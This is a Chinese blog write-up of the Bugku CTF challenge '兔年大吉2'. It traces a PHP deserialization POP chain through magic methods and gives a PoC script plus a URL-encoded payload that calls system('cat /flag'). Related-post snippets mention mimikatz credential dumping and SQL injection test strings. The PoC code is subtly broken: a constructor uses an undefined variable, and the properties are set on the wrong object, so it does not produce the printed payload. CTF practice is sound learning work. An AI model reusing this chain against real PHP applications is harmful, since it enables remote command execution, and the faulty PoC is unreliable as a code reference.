bugku 兔年大吉2题解

已于 2023-08-13 19:50:39 修改
阅读量387 收藏
点赞数
文章标签: php 网络安全
于 2023-08-13 19:34:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56313338/article/details/132261507
版权

源代码

<?php
highlight_file(__FILE__);
error_reporting(0);

class Happy{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __call($name, $arguments)
    {
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        die("Wishes can be fulfilled");
    }
}

class Nevv{
    private $happiness;

    public function __invoke()
    {
        return $this->happiness->check();
    }

}

class Rabbit{
    private $aspiration;
    public function __set($name,$val){
        return $this->aspiration->family;
    }
}

class Year{
    public $key;
    public $rabbit;

    public function __construct($key)
    {
        $this->key = $key;
    }

    public function firecrackers()
    {
        return $this->rabbit->wish = "allkill QAQ";
    }

    public function __get($name)
    {
        $name = $this->rabbit;
        $name();
    }

    public function __destruct()
    {
        if ($this->key == "happy new year") {
            $this->firecrackers();
        }else{
            print("Welcome 2023!!!!!");
        }
    }
}

if (isset($_GET['pop'])) {
    $a = unserialize($_GET['pop']);
}else {
    echo "过新年啊~过个吉祥年~";
}
?>

很明显,是一个反序列化漏洞

$a = unserialize($_GET['pop']);

前置知识

php魔术方法:

  • __call() : 在对象中调用一个不可访问方法时, __call() 会被调用
  • __invoke: 当一个对象被作为函数调用时被调用
  • __set: 当对象设置一个不存在的属性时调用
  • __get: 当对象访问一个不存在的属性时调用

序列化只会保存对象的属性对应的值

分析

找有没有危险函数, 在Happy类中找到了

public function __call($name, $arguments)
    {
        call_user_func($this->cmd, $this->content);
    }

这里我们需要找到哪里调用了未定义的方法
可以找到 Nevv 对象

class Nevv{
    private $happiness;

    public function __invoke()
    {
        return $this->happiness->check();
    }
}

根据对象内容我们找到Year对象中的 __get 方法

    public function __get($name)
    {
        $name = $this->rabbit;
        $name();
    }

如果将 $this->rabbit的值换成 Nevv 就可以执行 __invoke 方法

同样如果需要执行这个对象我们就需要访问一个不存在的属性

class Rabbit{
    private $aspiration;    // Year
    public function __set($name,$val){
        return $this->aspiration->family;   
    }
}

根据上述内容找到

    public function firecrackers()
    {
        return $this->rabbit->wish = "allkill QAQ";
    }

上面设置了未知方法
找到调用的地方,在Year对象中

    public function __destruct()
    {
        if ($this->key == "happy new year") {
            $this->firecrackers();
        }else{
            print("Welcome 2023!!!!!");
        }
    }
}

在对象销毁时执行并且 $this->key = "happy new year"

到这里就分析完毕这一整条反射链

Happy -> Nevv -> Year -> Rabbit -> Year

也就是说我们需要构造的话以下反射链

Year-> Rabbit -> Year -> Nevv -> Happy

poc

<?php
class Happy
{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }
}

class Nevv
{
    private $happiness;
    function __construct($happiness)
    {
        $this->happiness = $happiness;
    }
}

class Rabbit
{
    private $aspiration;    // Year
    function __construct()
    {
        $this->aspiration = $aspiration;
    }
}

class Year
{
    public $key;
    public $rabbit;
}


$happy = new Happy("system", "cat /flag");
$Nevv  = new Nevv($happy);     # Nevv -> Happy

$Year = new Year();
$Year->key = 0;
$Year->rabbit = $Nevv;      # Year -> Nevv 


$Rabbit = new Rabbit($Year);   #  Rabbit -> Year

$Year2 = new Year();
$Year->key = "happy new year";
$Year->rabbit = $Rabbit;      # Year-> Rabbit 

# Year-> Rabbit -> Year -> Nevv -> Happy
echo urlencode(serialize($Year2));

O%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22happy+new+year%22%3Bs%3A6%3A%22rabbit%22%3BO%3A6%3A%22Rabbit%22%3A1%3A%7Bs%3A18%3A%22%00Rabbit%00aspiration%22%3BO%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22happy+new+year%22%3Bs%3A6%3A%22rabbit%22%3BO%3A4%3A%22Nevv%22%3A1%3A%7Bs%3A15%3A%22%00Nevv%00happiness%22%3BO%3A5%3A%22Happy%22%3A2%3A%7Bs%3A10%3A%22%00Happy%00cmd%22%3Bs%3A6%3A%22system%22%3Bs%3A14%3A%22%00Happy%00content%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7D%7D%7D%7D
bug小空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jumbo Extra Cheese 2 题解图片1
10-30
Jumbo Extra Cheese 2 题解图片1
兔年大吉2
m0_52061428的博客
02-12 659
哈哈,祝愿各位师傅在新的一年,能够与所钟爱之人相伴,学业事业皆如登峰造极,一切皆能腾飞入云!虽然迈入了龙年,然而我们不能忘记刚刚过去的兔年,不是吗?虽然龙年已至,然而学习不能松懈,今天做一题新春题材的题目。所以,我们可以写出这样一个脚本以构造序列化语句。
Bugku-兔年大吉2
Web学习之路
06-05 484
兔年早过了啊
反序列化漏洞
十一.的博客
09-13 137
反序列化漏洞
BUUCTF Reverse 新年快乐 WriteUp
PlumpBoy的博客
09-10 1032
新年快乐-WP 首先放入ExeinfoPE,查出来是UPX的壳 放入kali脱壳 upx -d 1.exe 脱壳后扔入IDA __main(); strcpy(Str2, "HappyNewYear!"); Str1 = 0; memset(v6, 0, sizeof(v6)); printf("please input the true flag:"); scanf("%s", &Str1); if ( !strncmp((const char *)&Str1,
Bugku misc wp
God_of_fear的博客
10-22 2445
一个小白的学习之旅
BugkuCTF 部分题解(随缘更新)
volcano的博客
12-30 8652
之前做的题在 佛系更新 等假期抽空做 bugku佛系更新MISC简单取证1南城旧梦成果狗成果狗 MISC 简单取证1 下载得到windows系统下一个目录,获取用户名和密码需要用SAM和system两个文件。 把SAM和SYSTEM文件放到Win32文件夹下,运行mimikatz,执行命令 所以flag{administrator-QQAAzz_forensics} 南城旧梦 mmz.bmp文件尾有一段DE@@=<6J:DB625K4,rot47解码后得到stoolkeyisqeadzc 意思是使
第2章 基本放大电路题解1-教程与笔记习题
05-19
第二章"基本放大电路题解1"主要涵盖了放大电路的基础理论、设计方法以及分析技巧。这章的学习目标是帮助学生掌握如何分析和设计基本的单级放大器,如共射极、共基极和共集电极放大电路,以及它们的性能特点。 首先...
C++队列复原2样例题解
08-07
C++队列复原2样例题解
20240812题解20240812
08-12
20240812题解20240812
PAT甲级所有题解代码
02-03
这里包含了179道PAT甲级的代码AC题解,供有需要通过PAT考试的同学下载学习使用。
一道关于php文件包含的CTF题
m0_62903168的博客
08-27 2080
这是index.php的页面。点击login后会发现url里多了action的参数,那么我们就可以通过它来获取源码。?再通过base64的解码可以查看源码。
使用 树莓派3B+ 对日本葡萄园进行经济实惠的环境监测
EDATEC的博客
08-29 1123
然而,他也热衷于酿造 “优质葡萄酒”,随着他所居住的东京北部胜沼地区葡萄酒旅游业的兴起,他感觉到了商机。菊岛热衷于在他所谓的 “Hinno ”物联网系统中使用太阳能,日语中的 “Hinno ”表明这是一种简单的农民葡萄栽培方法,因为太阳能还可以用来为电栅栏供电,防止动物靠近作物。他还可以在办公室里随时观察大气状况。对于 菊岛邦夫—Vineyard Kikushima 而言,Raspberry Pi 生态系统提供了支持和信息,通过基于温度和湿度监测的有针对性的最低限度杀虫剂方案,来提高葡萄的健康产量。
Nginx的lnmp服务搭建
2201_75745826的博客
08-29 1056
nginx是一款功能强大的web服务器。和apache一样,有http和https两个服务。nginx功能强大,且库使用第三方模块,正反向代理等。Nginx默认采用多进程工作方式,Nginx启动后,会运行一个master进程和多个worker进程。其中master充当整个进程组与用户的交互接口,同时对进程进行监护,管理worker进程来实现重启服务、平滑升级、更换日志文件、配置文件实时生效等功能。worker用来处理基本的网络事件,worker之间是平等的,他们共同竞争来处理来自客户端的请求。
【Linux篇】网络请求和下载与端口
2301_80912559的博客
08-26 1446
如图,计算机A的微信连接计算机B的微信,A使用的50001即动态端口,临时找一个端口作为出口。计算机B的微信使用端口5678,即注册端口,长期绑定此端口等待别人连接。在win系统中,可以通过任务管理器选择进程后,点击结束进程从而关闭。IP地址相当于小区地址,在小区内可以有很多住户(程序)而门牌号(端口)就是各个住户(程序)的联系地址。为管理运行的程序,每一个程序在运行的时候,便被操作系统注册为系统中的一个进程。计算机程序之间的通讯,通过IP只能锁定计算机,但是无法锁定具体的程序。
workman和GateWay学习笔记
最新发布
lxp199741的博客
08-30 163
workman支持UdpGateWay是基于workman的二次封装,更适合长链接场景。
Upload-Lab第20关:如何利用文件名可控漏洞?
didiplus
08-27 435
在Upload-Lab的第20关中,系统没有对上传文件的内容进行验证,而是仅对用户输入的文件名进行了检查。具体来说,系统使用文件后缀名的黑名单进行过滤,但由于上传的文件名是用户可控的,这为绕过机制提供了可能性。此外,函数还有一个特性,即它会忽略文件名末尾的/.,这可以被利用来绕过后缀名的黑名单检查,从而上传恶意文件。通过这一关的学习,我们可以深入理解 Apache 配置文件的作用及其在安全防护中的重要性。同时,这也提醒我们在设计和开发上传功能时,必须考虑到所有可能的攻击面,确保服务器配置的安全性和稳健性。
网络安全】XML-RPC漏洞之盲SSRF
等风来
08-27 292
我收到的响应是这样的,响应体中的状态为0,表示请求已成功发送:
第三章 封装与继承
weixin_65279640的博客
08-28 1224
面向对象三大特征之一 ——封装概念:将类的某些信息隐藏在类内部,不允许外部程序直接访问,而是通过该类提供的方法来实现对隐藏信息的操作和访问把尽可能多的东西藏起来,对外提供便捷的接口。说白了就是把对象中的属性信息封装在对象类内部,不让用户直接使用类属性进行访问,而是定义一个方法作为类属性的接口提供给用户访问使用。封装的两个大致原则把所有的属性藏起来把尽可能多的东西藏起来,对外提供便捷的接口。
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取数据库中的某个表的内容。 2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们需要判断注入类型。可以通过在输入框中输入一些测试语句(如' or 1=1--)来判断是否存在注入漏洞。如果页面返回正常,那么很可能存在注入漏洞。 4. 获取数据库信息:一旦确认存在注入漏洞,我们可以通过构造合适的SQL语句来获取数据库信息。可以使用UNION SELECT语句来获取表的列数和列名,然后使用SELECT语句获取表的内容。 5. 构造SQL语句:根据题目要求,我们需要获取某个表的内容。可以使用如下语句来获取表的内容: SELECT column_name FROM information_schema.columns WHERE table_name='表名'; SELECT * FROM 表名; 6. 获取结果:根据构造的SQL语句,将其作为输入发送给服务器,获取返回的结果。根据返回的结果,我们可以得到表的列数、列名和表的内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值